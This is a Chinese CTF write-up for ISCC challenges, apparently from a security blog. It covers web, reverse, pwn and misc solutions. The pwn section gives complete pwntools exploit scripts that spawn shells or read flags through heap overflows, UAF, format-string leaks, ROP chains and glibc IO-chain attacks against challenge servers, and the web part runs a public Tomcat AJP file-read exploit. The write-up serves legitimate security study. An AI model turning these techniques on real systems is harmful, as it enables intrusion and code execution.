前言:
关注鱼影安全,欢迎交流学习!
🛰:ly3260344435
🐧:3260344435
BiliBili:落寞的鱼丶
公众号:鱼影安全
CSDN:落寞的魚丶
知识星球:中职-高职-CTF竞赛
WEB:
还没想好名字的塔防游戏:
F12查看源代码word.js 找到3段提升标题+js 大写字母即可。
ISCC{MDWTSGTMMSSSPFRMMM}
代码审计:
听说你的代码能力很强,flag在flag.txt里面哦
发现geneSign的路由,这个用来获取签名
http://101.200.138.180:12315/geneSign?param=flag.txtread
GET /De1ta?param=flag.txt HTTP/1.1
Host: 101.200.138.180:12315
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=1
Cookie: action=readscan;sign=c451a16ad8a948bf46e81eae0fa93834
ISCC{jYkFpFWcWOJ86AYd}
原神启动:
你能打败强大的怪物,获得宝藏吗?
使用工具扫描 发现漏洞,网上找个exp:漏洞利用
nuclei -u http://101.200.138.180:8080/ -me zgx
python2 CNVD-2020-10487-Tomcat-Ajp-lfi\ \1.py 101.200.138.180 -p 8009 -f WEB-INF/flag.txt
ISCC{OxxcjzK0ROr7s_uI}
Reverse:
迷失之门:
该用哪吧钥匙开门呢?
无壳64位程序,使用IDA打开
发现使用check函数检查输入的flag是否正确
check函数中是一段加密,又嵌套了一个check_2函数
check_2对加密后的字符串进行逐个对比,由此可以提取出密文,解得flag
encrypted_values = [] #密文
enc = [chr(i) for i in encrypted_values]
def decrypt(s):
char_sets = {
"upper": "ABCDEFGHIJKLMNOPQRSTUVWXYZ",
"lower": "abcdefghijklmnopqrstuvwxyz",
"special": "0123456789+/-=!#&*()?;:*^%",
"key": "DABBZXQESVFRWNGTHYJUMKIOLPC"
}
decoded = []
for i, char in enumerate(s):
if char in char_sets["upper"]:
offset = char_sets["upper"].find(char)
decoded_char = chr(ord(char_sets["key"][i]) + offset)
elif char in char_sets["lower"]:
offset = char_sets["lower"].find(char)
decoded_char = chr(ord(char_sets["key"][i]) + offset + 26)
elif char in char_sets["special"]:
offset = char_sets["special"].find(char)
decoded_char = chr(ord(char_sets["key"][i]) + offset + 52)
else:
decoded_char = char
decoded.append(decoded_char)
return ''.join(decoded)
decrypted_text = decrypt(enc)
print(decrypted_text)
ISCC{bXdW^dVko[crn~auuduky}
Ai:
给的pyc文件放到pyc反编译在线网站上,得到源代码chatgpt写个解密脚本得到密码
import base64
def decrypt_and_compare(encrypted_base64, offset_str):
encrypted_bytes = base64.b64decode(encrypted_base64).decode('utf-8')
decrypted_chars = []
for i, char in enumerate(encrypted_bytes):
offset = int(offset_str[i])
encrypted_val = ord(char)
if i % 2 == 0:
new_ascii = (encrypted_val ^ offset) - offset
else:
new_ascii = (encrypted_val ^ offset) + offset
decrypted_char = chr(new_ascii)
decrypted_chars.append(decrypted_char)
decrypted_str = ''.join(decrypted_chars)
return decrypted_str
_187z = 'AI-18.7z'
offset_str = '123456789012345678901234'
target_base64 = 'TWF/c1sse19GMW5gYVRoWWFrZ3lhd0B9'
decrypted_str = decrypt_and_compare(target_base64, offset_str)
print(decrypted_str)
#Key{Y0u_F1nd_The_key_w@}
import torch
import torch.nn as nn
import torchvision.transforms as transforms
from PIL import Image
import os
# 定义神经网络模型
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.fc1 = nn.Linear(28 * 28, 128)
self.fc2 = nn.Linear(128, 64)
self.fc3 = nn.Linear(64, 10)
def forward(self, x):
x = x.view(-1, 28 * 28)
x = torch.relu(self.fc1(x))
x = torch.relu(self.fc2(x))
x = self.fc3(x)
return x
# 加载模型
def load_model(model_path):
model = torch.load(model_path)
model.eval()
return model
# 对图像进行预处理和数字预测
def preprocess_and_predict(model, image_path):
transform = transforms.Compose([
transforms.Grayscale(num_output_channels=1),
transforms.Resize((28, 28)),
transforms.ToTensor(),
transforms.Normalize((0.5,), (0.5,))
])
image = Image.open(image_path)
image = transform(image)
image = image.unsqueeze(0)
with torch.no_grad():
outputs = model(image)
_, predicted = torch.max(outputs, 1)
return predicted.item()
# 获取图像文件夹中的所有图像文件,并预测数字
def predict_digits_in_folder(model, image_folder):
results = []
for i in range(1, 25):
image_path = os.path.join(image_folder, f"{i}.png")
predicted_digit = preprocess_and_predict(model, image_path)
results.append(predicted_digit)
return results
# 根据数字替换为特定字符
def replace_with_table(results, table):
return "".join([table[str(i)] for i in results])
# 主函数
def main():
model_path = "confused_digit_recognition_model.pt"
image_folder = "./"
# 加载模型
model = load_model(model_path)
# 预测数字
results = predict_digits_in_folder(model, image_folder)
# 字符替换
table = {"0": "@nd", "1": "a!", "2": "_", "3": "F", "4": "SSS", "5": "W@", "6": "K", "7": "1", "8": "C", "9": "d"}
replaced_results = replace_with_table(results, table)
# 输出结果
print("Predicted digits:", "".join([str(i) for i in results]))
print("Replaced characters:", replaced_results)
if __name__ == "__main__":
main()
# Created By Evi1s7
##C11C@ndKCK_FF_KCSSS_W@FdW@a!_SSSd
CrypticConundrun:
Do not get lost!
检测到UPX,用UPX脱壳
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2023
UPX 4.0.2 Markus Oberhumer, Laszlo Molnar & John Reiser Jan 30th 2023
File size Ratio Format Name
-------------------- ------ ----------- -----------
61558 <- 46710 75.88% win64/pe Cryptic.exe
Unpacked 1 file.
可以看到经过了两次加密,一次是mix,一次是Encryption,根据逻辑写出解密操作
def decryption(enc, key):
a3 = len(enc)
key_int = [ord(c) for c in key]
for n in range(a3):
enc[n] -= 10
for m in range(a3 - 1):
enc[m] += enc[m + 1]
for k in range(a3 - 1):
enc[k] ^= key_int[2]
for j in range(0, a3, 2):
enc[j] ^= key_int[j % 4]
for j in range(a3 // 2):
enc[j], enc[a3 - j - 1] = enc[a3 - j - 1], enc[j]
for i in range(a3 // 2):
enc[i], enc[a3 - i - 1] = enc[a3 - i - 1], enc[i]
for i in range(a3):
enc[i] += key_int[i % 4]
def main():
key = "ISCC"
enc = [0x34, 0xEA, 0x6D, 0xA7, 0xB0, 0x9C, 0x30, 0xE4, 0x7B, 0xC8,
0xEB, 0x2C, 0x8F, 0x8A, 0x40, 0xB5, 0xA0, 0xAE, 0xC3, 0x50,
0x07, 0xEE, 0xE5, 0x62, 0xF4, 0x34]
decryption(enc, key)
print("".join(chr(i % 256) for i in enc))
if __name__ == "__main__":
main()
ISCC{NCKn/F'XH$EyqBC4OvDg}
Badcode:
好学的小明又开始学习c++了,他猛猛写了一堆代码,并且很高兴实现了功能,但是我们发现,他的代码写的真的很差,这次他又将自己的秘密藏在里面,你能揭穿他的秘密吗?
32位无壳,调试发现关键加密函数
查找资料对比发现 XXTEA 加密,根据main整体逻辑写出解密脚本
#include <stdio.h>
#include <stdint.h>
#define DELTA 0x9e3779b9
#define MX (((z>>5^y<<2) + (y>>3^z<<4)) ^ ((sum^y) + (key[(p&3)^e] ^ z)))
#include <iostream>
using namespace std;
void btea(uint32_t *v, int n, uint32_t const key[4]) {
uint32_t y, z, sum;
unsigned p, rounds, e;
n = -n;
rounds = 6 + 52 / n;
sum = rounds * DELTA;
y = v[0];
do {
e = (sum >> 2) & 3;
for (p = n - 1; p > 0; p--) {
z = v[p - 1];
y = v[p] -= MX;
}
z = v[n - 1];
y = v[0] -= MX;
sum -= DELTA;
} while (--rounds);
}
int main() {
uint32_t key[4] = {0x12345678, 0x9ABCDEF0, 0xFEDCBA98, 0x76543210};
uint32_t v[] = {0xE9E4F557,
0xD4988D1A,
0x9DC89258,
0xD50B9B4C,
0x3601727B,
0x91FEF8D1
};
btea(v, -6, key);
string xxtea = (char *)v;
int v16[24];
srand(0x18);
for (int i = 0; i < 24; ++i ) {
v16[i] = rand() % 10 + 48;
}
for (int k = 0; k < 24; ++k ) {
xxtea[k] ^= (v16[k] - 48);
}
for (int j = 0; j < 24; ++j ) {
if ( j % 2 ) {
xxtea[j] -= 2;
} else {
xxtea[j] += 3;
}
}
for (int i = 0; i < 24; i++) {
cout << (char)xxtea[i];
}
}
ISCC{ePm87e9saHb9C51MWv}
WinterBegins:
My frozen pen, reluctant to write a new poem,
Warms old wine beside the cold stove from time to time.
Drunk, I gaze at the ink blots in the moonlight,
And fancy a village, deeply covered in snow.
主程序逻辑如上,跟踪flag输入发现主要加密函数,是个类似索引取密码表替换明文的操作
这是主要加密部分,提取出密文和表,根据程序逻辑解密即可
这里sub_140001490的作用就是字符串反转,所以提取出来的密文是逆序的,要反转
def decode(enc, table):
idx_list = [table.find(enc[i:i+2]) // 2 for i in range(0, len(enc), 2)]
char_list = []
for i in range(len(idx_list)):
if idx_list[i] == 11:
char_list.append(chr(61 + idx_list[i+1]))
i += 1
else:
char_list.append(chr(idx_list[i] + ord('0')))
return ''.join(char_list)
table="冻笔新诗懒写寒炉美酒时温醉看墨花月白恍疑雪满前村"
enc="美酒恍疑时温寒炉美酒寒炉寒炉懒写墨花前村时温时温前村恍疑醉看前村墨花墨花前村美酒墨花墨花醉看月白墨花时温墨花墨花醉看懒写墨花月白时温前村恍疑墨花前村美酒醉看寒炉寒炉懒写醉看前村时温墨花美酒醉看醉看墨花月白时温前村恍疑寒炉懒写墨花前村墨花"
print(decode(enc, table))
#495343327B5F6D7A7768757762785F7A63326B7466785F327D0
根据程序逻辑把2替换成前一个字符即可 ISCC{mzwhuwbx_zccktfx_}
ISCC{_mzwhuwbx_zccktfx__}
Find_All:
当你走出这片森林,未来的光明将是你的收获,路途的脚印亦是你的宝藏
题目是一个迷宫逆向
● v4, v5: 用于存储sub_401050函数调用的参数。
● v6, v7: 用于存储玩家在迷宫中的当前位置坐标。
● v8, v9: 用于存储玩家输入后的新位置坐标。
● v10: 一个字符数组,用于存储用户输入的flag。
● v11: 一个更大的字符数组,用于存储迷宫的布局。
● v12: 一个整数,用作程序的返回值。
程序首先使用qmemcpy函数将一个特定的字符串复制到v11数组中,这个字符串代表了迷宫的布局,然后有个调试器检查,绕过它就行。如果没有检测到调试器,程序将初始化迷宫,设置玩家的起始位置,并进入一个循环,允许用户通过按键('a', 'd', 's', 'w')来控制玩家在迷宫中的移动。用户的移动受到限制,只能在迷宫的边界内移动,并且不能移动到非空格('48')的位置。当用户移动到迷宫中标记为'75'(ASCII码为'K')的位置时,循环结束。
可以直接找到flag存储密文的地方
提取出密文解密即可
def transform(v):
for i in range(0, len(v) - 1, 4):
v4[i + 2] ^= v4[i+3]
v4[i + 1] ^= v4[i + 2]
v4[i] ^= v4[i + 1]
return v
v4 = [get_wide_byte(0x00401625 + i * 7) for i in range(24)]
print(bytes(transform(v4)).decode())
ISCC{DCf129Dc@Ac@cdvg@!}
I_am_the_Mathematician:
The mathematician has a codebook.
Who is the mathematician and where is the true code?
发现了一个关键字,题目似乎跟斐波那契数列的算法有关,程序主体操作是一个简单的逐个字符进行累计,写出脚本对txt密文进行解密即可
def fib(n):
a, b = 0, 1
lis = []
for _ in range(n):
lis.append(a)
a, b = b, a + b
return lis
with open("./code_book_21.txt", "r") as file:
data = file.read()
target = fib(20)
assert target[-1] > len(data) # 确保文件内容长度小于第20个斐波那契数
print(f"ISCC{{{''.join(data[i - 1] if i < len(data) else '' for i in target)}}}")
ISCC{77niT9odtSBrrXctcs}
DLLcode:
把鸡蛋放在同一个篮子里是一个错误的决定
发现调用DLL进行加密,下面是密文分析DLL
Block = [73, 83, 67, 67]
v4 = [2, 0, 3, 1, 6, 4, 7, 5, 10, 8, 11, 9]
enc = [] #密文
enc_back = enc[:12]
enc_front = enc[12:]
flag = [0] * 24
for i in range(12):
flag[2 * i + 1] = enc_front[v4[i]]
for i in range(12):
enc_back[i] ^= Block[i & 3]
for i in range(12):
flag[2 * i] = enc_back[i]
print(''.join(chr(x) for x in flag))
ISCC{YWYXSZPdSbJRuStWb@}
PWN:
chaos:
It is not chaos!
chaos函数,如果*ptr==Flag,就可以提权
ptr固定大小为0x70,v2的大小可以任意跳转,可以先申请一个0x20大小的堆然后释放进bin中,这样在chaos函数的时候,v2的堆块在ptr上面,这个时候溢出到下面即可
from pwn import *
from ctypes import*
p=remote('182.92.237.102',10010)
def create(Size,Content=b'a'):
p.recvuntil(b'Choice')
p.sendline(b'1')
p.recvuntil(b'Size')
p.sendline(bytes(str(Size),'utf-8'))
p.recvuntil(b'Chaos')
p.sendline(Content)
def free(id):
p.recvuntil(b'Choice')
p.sendline(b'2')
p.recvuntil(b'index')
p.sendline(bytes(str(id),'utf-8'))
def backdoor(Size,Content):
p.recvuntil(b'Choice')
p.sendline(b'5')
p.recvuntil(b'size')
p.sendline(bytes(str(Size),'utf-8'))
p.recvuntil(b'Content')
p.send(Content)
create(0x18)
free(0)
backdoor(0x18,b'\x00'*0x20+b'Flag\x00\n')
p.interactive()
easyshell:
一个可以帮你验证flag的shell
func函数,有一个溢出和fmt漏洞,
还给了后门函数,先利用fmt泄露出canary和elf地址,之后ret2text
from pwn import *
from ctypes import*
p=remote('182.92.237.102',10011)
payload=b'flagis\x00'+b'%17$p--%15$p'
p.recvuntil(b'>>')
p.sendline(payload)
p.recvuntil(b'0x')
elf_add=int(p.recv(6*2),16)
elfbase=elf_add-0x1520
success('elfbase '+hex(elfbase))
p.recvuntil(b'0x')
canary=int(p.recv(8*2),16)
success('canary '+hex(canary))
backdoor=elfbase+0x1291
payload=b'exit'.ljust(56,b'\x00')+p64(canary)+p64(0)+p64(backdoor)
p.recvuntil(b'>>')
p.sendline(payload)
p.interactive()
ISCC_U:
Canary下的简单堆栈
main函数,一个堆题
在add函数中,堆包含堆的关系,在第一个堆上放了函数指针,然后引用输出完成打印
del函数,中有uaf
利用uaf漏洞对原来地址上的函数指针覆盖为system就行
from pwn import *
io = remote('182.92.237.102', 10016)
libc = ELF('../libc/libc6-i386_2.31-0ubuntu9.14_amd64.so')
def allocate(Size, Content=b'a'):
io.recvuntil(b'choice')
io.sendline(b'1')
io.recvuntil(b'size')
io.sendline(bytes(str(Size), 'utf-8'))
io.recvuntil(b'Content')
io.send(Content)
def deallocate(id):
io.recvuntil(b'choice')
io.sendline(b'2')
io.recvuntil(b'Index')
io.sendline(bytes(str(id), 'utf-8'))
def show(id):
io.recvuntil(b'choice')
io.sendline(b'3')
io.recvuntil(b'Index')
io.sendline(bytes(str(id), 'utf-8'))
context.arch = 'i386'
allocate(0x500) # 0
allocate(0x20) # 1
deallocate(0)
allocate(0x500, b'a' * 4) # 2
show(0)
libc_address = u32(io.recvuntil(b'\xf7')[-4:])
malloc_hook = libc_address - 56 - 0x18
libc_base = malloc_hook - libc.symbols['__malloc_hook']
system_addr = libc_base + libc.symbols['system'] + 1
puts_addr = libc_base + libc.symbols['puts']
success('malloc_hook ' + hex(malloc_hook))
success('libc_base ' + hex(libc_base))
deallocate(1)
deallocate(2)
allocate(0x8, p32(system_addr) + b';sh;')
show(1)
io.interactive()
ISCC{9a7c5fbc-9d62-4edc-998a-62e8152f4df3}
Flag:
一个简单的c语言编译器
main函数,在welcome函数中,字符串格式化漏洞
在back中有栈溢出
利用fmt泄露出canary,因为没给libc,利用溢出ret2libc,这里使用libcsearch
from pwn import *
from LibcSearcher import *
io = remote('182.92.237.102', 10012)
# io = process('../pwn')
elf = ELF('../pwn')
context.arch = 'i386'
payload = b'a%19$p'
io.sendline(payload)
io.recvuntil(b'0x')
canary = int(io.recv(4*2), 16)
success('canary ' + hex(canary))
leak = 'read'
leak_got = elf.got[leak]
puts_plt = elf.plt['puts']
call_back = 0x80494E0
payload = b'a' * (136) + p32(canary) + p32(0xdead) + b'a' * (8)
payload += p32(puts_plt) + p32(call_back) + p32(leak_got)
io.recvuntil(b'Input')
io.sendline(payload)
leak_add = u32(io.recvuntil(b'\xf7')[-4:])
libc = LibcSearcher(leak, leak_add)
libcbase = leak_add - libc.dump(leak)
system = libcbase + libc.dump('system')
str_bin_sh = libcbase + libc.dump('str_bin_sh')
log.info('libcbase ' + hex(libcbase))
payload = b'a' * (136) + p32(canary) + p32(0xdead) + b'a' * (8)
payload += p32(system) + p32(call_back) + p32(str_bin_sh)
io.recvuntil(b'Input')
io.sendline(payload)
io.interactive()
Your_program:
打开main函数,init之后调用了这个函数
发现直接无限溢出并且程序没有开任何保护直接打
from pwn import *
io = process('./pwn')
elf_object = ELF('./pwn')
context(arch='amd64', os='linux')
#gdb.attach(io, 'b *0x00000000004012DA')
rdi_ret = 0x0000000000401763
leave_addr = 0x00000000004012DA
o_address = 0x0000000000403668
leak_function = 0x0000000004013D3
io.recvuntil('y: ')
payload = b'A'*0x20 + p64(elf_object.bss() + 0x200)
payload += p64(rdi_ret) + p64(o_address - 0x28) + p64(elf_object.plt['gets'])
payload += p64(leak_function) + p64(rdi_ret) + p64(elf_object.bss() + 0x200) + p64(elf_object.plt['gets']) + p64(leave_addr)
io.sendline(payload)
io.recvuntil('ul!\n')
io.sendline(p64(leave_addr + 1) * 5 + p64(o_address - 0x28))
io.sendline('%p')
stack_addr = int(io.recvline()[:-1], 16)
payload2 = p64(0) + p64(rdi_ret) + p64(stack_addr) + p64(elf_object.plt['gets']) + p64(stack_addr)
io.sendline(payload2)
io.sendline(asm(shellcraft.sh()))
io.interactive()
ISCC{fb521a80-eba3-403f-a16c-5e80d2ac267d}
miao:
这里有一只可爱的小猫
静态编译需要自己修复函数,开了canar,这里fmt先泄露canary
然后miaomiao中直接溢出,静态连接的程序,直接生成ropchain
from pwn import *
p=remote('182.92.237.102',10015)
# p=process('./pwn')
p.sendline(b'%31$p')
p.recvuntil(b'0x')
canary=int(p.recv(4*2),16)
log.info('canary '+hex(canary))
context.arch='i386'
str_bin_sh=0x80BB7C8
int_x80=0x0806cf83
eax_ret=0x080b8666
ecx_ret=0x080def3d
edx_ret=0x0806f30a
ebx_edx_ret=0x0806f309
ropchain=b''
ropchain+=p32(eax_ret)+p32(11)
ropchain+=p32(ebx_edx_ret)+p32(str_bin_sh)+p32(0)+p32(ecx_ret)+p32(0)
ropchain+=p32(int_x80)
payload=b'\x00'*(0x70-0xc)+p32(canary)+b'\x00'*(0xc-0x4)+p32(0)+ropchain
p.sendline(payload)
p.interactive()
eazy_heap:
一个简单的堆程序
在init开了沙盒,菜单选择
edit函数off_by_null,add函数限制了大小
高版本off_by_null+直接io链的orw安排上
from pwn import *
from ctypes import *
from ctypes import *
from struct import pack
conn = remote('182.92.237.102', 2122)
FILENAME = '../pwn4'
libc = ELF('../libc.so.6')
context.arch = 'amd64'
def create_block(size, content=b'a'):
conn.recvuntil(b'choice')
conn.sendline(b'1')
conn.recvuntil(b'size')
conn.sendline(bytes(str(size), 'utf-8'))
conn.recvuntil(b'content')
conn.send(content)
def free_block(idx):
conn.recvuntil(b'choice')
conn.sendline(b'2')
conn.recvuntil(b'idx')
conn.sendline(bytes(str(idx), 'utf-8'))
def edit_block(idx, content):
conn.recvuntil(b'choice')
conn.sendline(b'4')
conn.recvuntil(b'idx')
conn.sendline(bytes(str(idx), 'utf-8'))
conn.recvuntil(b'content')
conn.send(content)
def show_block(idx):
conn.recvuntil(b'choice')
conn.sendline(b'3')
conn.recvuntil(b'idx')
conn.sendline(bytes(str(idx), 'utf-8'))
create_block(0x410)
create_block(0x100)
create_block(0x430)
create_block(0x430)
create_block(0x100)
create_block(0x480)
create_block(0x420)
create_block(0x100)
free_block(0)
free_block(3)
free_block(6)
free_block(2)
payload = b'\x00' * (0x430) + p64(0) + p32(0x440 + 0x110 + 0x1)
create_block(0x430 + 0x20, payload)
create_block(0x410)
create_block(0x410)
create_block(0x420)
free_block(3)
free_block(2)
create_block(0x410, b'\x00' * 9) # 2 A
free_block(6)
free_block(5)
payload = b'\x00' * (0x480) + p64(0) + p64(0x431) + b'\x00'
create_block(0x500 - 0x8, payload)
create_block(0x3c0 - 0x8)
create_block(0x410)
free_block(4)
payload = b'\x00' * 0x100 + p64(0x550)
create_block(0x108)
edit_block(4, payload)
free_block(3)
create_block(0x430)
create_block(0x400)
show_block(3)
libc_add = u64(conn.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
libcbase = libc_add - 0x21a200
log.info('libcbase ' + hex(libcbase))
conn.recvuntil(b'\x7f')
heap_add = u64(conn.recv(8)) >> (8 * 2)
heapbase = heap_add - 0xc00
key = (heapbase >> 12) + 1
success('heapbase ' + hex(heapbase))
success('key ' + hex(key))
IO_2_1_stdout = libcbase + 0x21a780
create_block(0x400) # 9
free_block(9)
free_block(8)
edit_block(4, p64(key ^ IO_2_1_stdout))
IO_wfile_jumps = libcbase + 0x2160c0
success('IO_wfile_jumps ' + hex(IO_wfile_jumps))
setcontextadd = libcbase + libc.sym['setcontext']
ret = libcbase + 0x0000000000029cd6
# fake_IO
fakeIO_add = IO_2_1_stdout
orw_add = heapbase + 0x1050
A = fakeIO_add + 0x40
B = fakeIO_add + 0xe8 + 0x40 - 0x68
C = fakeIO_add
fake_IO = p64(0) # flag rdi
fake_IO = fake_IO.ljust(0x28, b'\x00')
fake_IO += p64(1) # _IO_write_ptr>_IO_write_base
fake_IO = fake_IO.ljust(0x88, b'\x00')
fake_IO += p64(fakeIO_add) # lock
fake_IO = fake_IO.ljust(0xa0, b'\x00')
fake_IO += p64(A) # _wide_data=rdx
fake_IO = fake_IO.ljust(0xd8, b'\x00')
fake_IO += p64(IO_wfile_jumps)
fake_IO += p64(orw_add) + p64(ret) + b'\x00' * 0x30
fake_IO += p64(B) + p64(setcontextadd + 61)
print(hex(len(fake_IO)))
mprotect = libcbase + libc.sym['mprotect']
rdi_ret = libcbase + 0x000000000002a3e5
rsi_ret = libcbase + 0x000000000002be51
rdx_r12_ret = libcbase + 0x000000000011f497
orw = p64(rdi_ret) + p64(heapbase - (heapbase & 0xfff)) + p64(rsi_ret) + p64(0x5000)
orw += p64(rdx_r12_ret) + p64(7) * 2 + p64(mprotect) + p64(orw_add + 0x48)
orw += asm(shellcraft.cat('flag')) + b'\x90' * 4
print(hex(len(orw)))
create_block(0x400, orw)
create_block(0x400, fake_IO)
conn.recvuntil(b'choice')
conn.sendline(b'5')
conn.interactive()
ISCC_easy:
Welcome to ISCC!
字符串格式化漏洞,直接溢出
利用字符串格式化漏洞泄露地址然后改num然后溢出覆盖就行了
from pwn import *
io = process('./pwn')
libc = ELF('./libc6-i386_2.31-0ubuntu9.14_amd64.so')
context.arch = 'i386'
num = 0x804C030
payload = fmtstr_payload(4, {num: 5}) + b'%15$p'
io.send(payload)
io.recvuntil(b'0x')
libc_add = int(io.recv(8), 16)
libcbase = libc_add - libc.sym['__libc_start_main'] - 245
success('libcbase ' + hex(libcbase))
system = libcbase + libc.symbols['system']
sh = libcbase + next(libc.search(b'/bin/sh'))
payload = b'a' * (0x90 + 0x4) + p32(system) * 2 + p32(sh)
io.recvuntil(b'Input')
io.sendline(payload)
io.interactive()
heapheap:
Largebin是一把功能十分强悍,它和Prtcl孰强孰弱呢?
开了沙盒的堆题,沙盒禁用了execve
uaf漏洞,但是只能申请到大chunk
使用largbin attack 打io链然后orw
from pwn import *
io = remote('182.92.237.102', 11000)
libc = ELF('../libc-2.31.so')
def add(index, size):
io.recvuntil(b'choice')
io.sendline(b'1')
io.recvuntil(b'index')
io.sendline(bytes(str(index), 'utf-8'))
io.recvuntil(b'Size')
io.sendline(bytes(str(size), 'utf-8'))
def free(index):
io.recvuntil(b'choice')
io.sendline(b'4')
io.recvuntil(b'index')
io.sendline(bytes(str(index), 'utf-8'))
def edit(index, content):
io.recvuntil(b'choice')
io.sendline(b'3')
io.recvuntil(b'index')
io.sendline(bytes(str(index), 'utf-8'))
io.recvuntil(b'context')
io.send(content)
def show(index):
io.recvuntil(b'choice')
io.sendline(b'2')
io.recvuntil(b'index')
io.sendline(bytes(str(index), 'utf-8'))
add(0, 0x420)
add(1, 0x410)
add(2, 0x410)
add(3, 0x410)
free(0)
show(0)
libc_address = u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
libc_base = libc_address - libc.symbols['__malloc_hook'] - 96 - 0x10
io_list_all = libc_base + 0x1ed5a0
log.info('libc_base ' + hex(libc_base))
log.info('io_list_all ' + hex(io_list_all))
add(4, 0x430)
edit(0, b'a'*(0x10-1)+b'A')
show(0)
io.recvuntil(b'A')
heap_address = u64(io.recvuntil(b'\n')[:-1].ljust(8, b'\x00'))
log.info('heap_address ' + hex(heap_address))
fd = libc_base + 0x1ecfd0
payload = p64(fd)*2 + p64(heap_address) + p64(io_list_all - 0x20)
edit(0, payload)
free(2)
add(5, 0x470)
free(5)
open_address = libc_base + libc.sym['open']
read_address = libc_base + libc.sym['read']
write_address = libc_base + libc.sym['write']
setcontext_address = libc_base + libc.sym['setcontext']
rdi = libc_base + 0x0000000000023b6a
rsi = libc_base + 0x000000000002601f
rdx_r12 = libc_base + 0x0000000000119431
ret = libc_base + 0x0000000000022679
# fake_IO
chunk_small = heap_address + 0x850
IO_wfile_jumps = libc_base + 0x1e8f60
fake_IO_address = chunk_small
orw_address = fake_IO_address + 0x200
A = fake_IO_address + 0x40
B = fake_IO_address + 0xe8 + 0x40 - 0x68
C = fake_IO_address
fake_IO = b''
fake_IO = fake_IO.ljust(0x18, b'\x00')
fake_IO += p64(1) # _IO_write_ptr>_IO_write_base
fake_IO = fake_IO.ljust(0x78, b'\x00')
fake_IO += p64(fake_IO_address) # lock
fake_IO = fake_IO.ljust(0x90, b'\x00')
fake_IO += p64(A) # _wide_data=rdx
fake_IO = fake_IO.ljust(0xc8, b'\x00')
fake_IO += p64(IO_wfile_jumps)
fake_IO += p64(orw_address) + p64(ret) + b'\x00'*0x30
fake_IO += p64(B) + p64(setcontext_address + 61)
flag_address = orw_address + 0x100 + 0x10
orw = p64(rdi) + p64(flag_address) + p64(rsi) + p64(0) + p64(open_address)
orw += p64(rdi) + p64(3) + p64(rsi) + p64(flag_address) + p64(rdx_r12) + p64(0x50) + p64(0) + p64(read_address)
orw += p64(rdi) + p64(1) + p64(write_address)
payload = fake_IO
payload = payload.ljust(0x200-0x10, b'\x00')
payload += orw
payload = payload.ljust(0x300, b'\x00')
payload += b'flag\x00'
edit(2, payload)
io.recvuntil(b'choice')
io.sendline(b'5')
io.interactive()
Shopping:
main函数中有字符串验证,然后启动线程的函数,主要就是申请chunk然后输入
调用mycall指针函数来实现打印
在myread中有逻辑漏洞会造成输入chunk的时候溢出
thread_arena来管理堆块,当申请到4页大小空间会和thread_arena相邻
这个时候溢出覆盖thread_arena控制指针完成提权
from pwn import *
io = remote('182.92.237.102', 10019)
def create_entry(size, content=b'a', count=0, mode=1):
io.recvuntil(b'Action')
io.sendline(b'1')
io.recvuntil(b'ID')
io.sendline(bytes(str(size), 'utf-8'))
io.recvuntil(b'Quantity')
io.sendline(bytes(str(count), 'utf-8'))
io.recvuntil(b'Add')
io.sendline(bytes(str(mode), 'utf-8'))
if content == b'no':
return
io.recvuntil(b'Message')
padded_content = content.ljust(size, b'\x00')
io.send(padded_content)
io.sendline(b"I'm ready for shopping")
io.recvuntil(b'***', timeout=5)
for i in range(12):
create_entry(0x4000, b'no', 1000, 0)
create_entry(0x4000, b'a', 261)
sleep(1)
create_entry(0x3000)
create_entry(0x1000 - 0x8, b'no')
io.send(b'a' * (0x1000 - 0x8 - 0x10))
sleep(1)
CALLW = 0x602038
system_address = 0x000000000400978
bss_address = 0x602040
payload = b'\x00' * (0x8 + 0x20 + 0x20) + p64(0) + p64(CALLW - 0x1b) * 6 + p64(bss_address) # remote
io.send(payload)
create_entry(0x60, b'\x00' * (0x1b - 0x10) + p64(system_address) + p64(0) + p64(0x8f))
create_entry(0x70, b'/bin/sh\x00')
io.interactive()
Misc:
RSA_KU:
一道简单的RSA
# -*- coding: utf-8
import gmpy2
from Crypto.Util.number import *
n = 129699330328568350681562198986490514508637584957167129897472522138320202321246467459276731970410463464391857177528123417751603910462751346700627325019668100946205876629688057506460903842119543114630198205843883677412125928979399310306206497958051030594098963939139480261500434508726394139839879752553022623977
e = 65537
c = 44966298375376688006146988322206393966214090881593395122244343443082290567508149057626773859464186519313116450319974063750688272400363080277647563949932916419619671548411693220994757715211785341917382400721102749647554428046099483334760987169167676276309344232592258014942773447115037760819673733353283537
n1= 129699330328568350681562198986490514508637584957167129897472522138320202321246467459276731970410463464391857177528123417751603910462751346700627325019668067056973833292274532016607871906443481233958300928276492550916101187841666991944275728863657788124666879987399045804435273107746626297122522298113586003834
n2 = 129699330328568350681562198986490514508637584957167129897472522138320202321246467459276731970410463464391857177528123417751603910462751346700627325019668066482326285878341068180156082719320570801770055174426452966817548862938770659420487687194933539128855877517847711670959794869291907075654200433400668220458
ppq=(n-n1+n-n2+4)//3 #p+q
'''n-(p-2)*(q-1)=pq-(pq-p-2q+2)=p+2q-2 ①
n-(p-1)*(q-2)=pq-(pq-2p-q+2)=2p+q-2 ②
①+②:n-(p-2)*(q-1)+n-(p-1)*(q-2)=3*(p+q)-4
p+q=(n-(p-2)*(q-1)+n-(p-1)*(q-2)+4)/3'''
phi=n-ppq+1 #phi=(p-1)*(q-1)=pq-(p+q)+1
d=gmpy2.invert(e,phi)
flag=long_to_bytes((pow(c,d,n)))
print(flag)
ISCC{zXKlYgKNvNEoF3dEkC--}
时间刺客:
2024年10月14日早8点,小明敲键盘时候解出了flag
使用键盘流量分析常用的两个脚本脚本分别是增加冒号的脚本和键盘解密脚本
f=open('6.txt','r')
fi=open('out.txt','w')
while 1:
a=f.readline().strip()
if a:
if len(a)==16:
out=''
for i in range(0,len(a),2):
if i+2 != len(a):
out+=a[i]+a[i+1]+":"
else:
out+=a[i]+a[i+1]
fi.write(out)
fi.write('\n')
else:
